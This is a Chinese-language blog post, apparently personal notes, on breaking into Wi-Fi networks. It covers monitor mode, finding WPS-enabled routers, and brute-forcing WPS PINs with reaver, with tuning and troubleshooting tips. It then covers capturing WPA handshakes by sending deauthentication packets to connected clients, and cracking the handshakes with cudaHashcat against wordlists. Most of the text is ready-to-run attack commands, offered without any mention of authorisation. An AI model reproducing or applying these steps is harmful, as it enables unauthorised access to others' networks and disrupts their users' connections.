文章目录
  1. 1. WPS破解
    1. 1.1. 使用网卡混杂模式(monitor)
      1. 1.1.1. 出现process占用
    2. 1.2. 查看wps
    3. 1.3. 破解
      1. 1.3.1. 问题
    4. 1.4. 存储文件
    5. 1.5. 重新上网
  2. 2. 关于暴力破解
    1. 2.1. 抓包
    2. 2.2. 跑包
    3. 2.3. Reference:

WPS破解

使用网卡混杂模式(monitor)

airmon-ng 查看网卡信息
airmon-ng start wlan0
1

出现process占用

airmon-ng check 查看占用进程
iwconfig 查看网卡是否处于monitor状态
sudo airmon-ng check kill 最直接的方法..所有占用的直接all kill

查看wps

  1. sudo wash -i wlan0mon -C

WPS Locked 为no 即可用wps
2

  1. airodump-ng wlan0mon

54e. 有点为wps
(MB选项的54e.和54e已经不能判断wps了)
3

破解

目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1
目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1
目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1

-c Channel信道 信道可从上面的airodump找出来

4

一般PIN码大概要个12-24小时左右的时间233[如果有60S的防PIN功能]
中断重pin的话找到MAC.wpc放入/etc/reaver/或者直接加上-p 前四位pin码就能继续

问题

1.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
一般是信号太差
2.
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
一般路由器的防PIN措施,还没碰到网上所说的300s….这个措施保证了PIN的可破解性

  1. 存储文件

    Version 1.5 —-/etc/reaver/MAC.wpc
    Version 1.4 —-/usr/local/etc/reaver/MAC.wpc

重新上网

service network-manager start

关于暴力破解

抓包

http://www.secbox.cn/hacker/wireless/4877.html

  1. airodump-ng -w freedom -c CH –bssid mac地址 wlan0mon –ignore-negative-one
    CH表示信道,信道是多少就填多少,freedom是一会抓握手包的文件名字,他会自动生成一个freedom.cap的文件,这个名字随便你们填什么
  2. 重新开一个客户端输入命令:
    aireplay-ng –deaut 10 -a 路由器mac -c 客户端mac wlan0mon –ignore-negative-one

跑包

cudaHashcat, advanced password recovery #鉴于windows独立显卡的支持比较好,在windows平台工作非常棒,GPU跑包咻咻咻的快

下面为常用参数
cudaHashcat64.exe –attack-mode 0
-m /–hash-type 2500
-a / –attack-mode 0
–segment-size 3036 内存缓存大小
–gpu-loops 1000 Gpu性能
–gpu-accel 160 负载优化
–increment –increment-min 8 –increment-max 10

这个是实例 —- .txt后缀都是密码包,关键还是要看弱密码的数据质量了=, = 跑几个G还是很快的

cudaHashcat64.exe –hash-type 2500 –attack-mode 0 samsing-01.hccap 2(1).txt 2(2).txt 2(3).txt 2(4).txt 2(5).txt 2(6).txt 2(7).txt 2(8).txt 2(9).txt 2(10).txt 2(11).txt 2(12).txt 2(13).txt 2(14).txt 2(15).txt 2(16).txt 2(17).txt 2(18).txt 2(19).txt 2(21).txt 2(22).txt 2(23).txt 2(24).txt 2(25).txt 2(26).txt 2(27).txt 2(28).txt 2(29).txt 2(30).txt 2(31).txt 2(32).txt

手册(manual)

[hashcat-manual]https://hashcat.net/wiki/doku.php?id=hashcat

Reference:

airmon-ng
secbox
kali.org
stackexchange
Frebuf
hackingtutorials
51cto

文章目录
  1. 1. WPS破解
    1. 1.1. 使用网卡混杂模式(monitor)
      1. 1.1.1. 出现process占用
    2. 1.2. 查看wps
    3. 1.3. 破解
      1. 1.3.1. 问题
    4. 1.4. 存储文件
    5. 1.5. 重新上网
  2. 2. 关于暴力破解
    1. 2.1. 抓包
    2. 2.2. 跑包
    3. 2.3. Reference: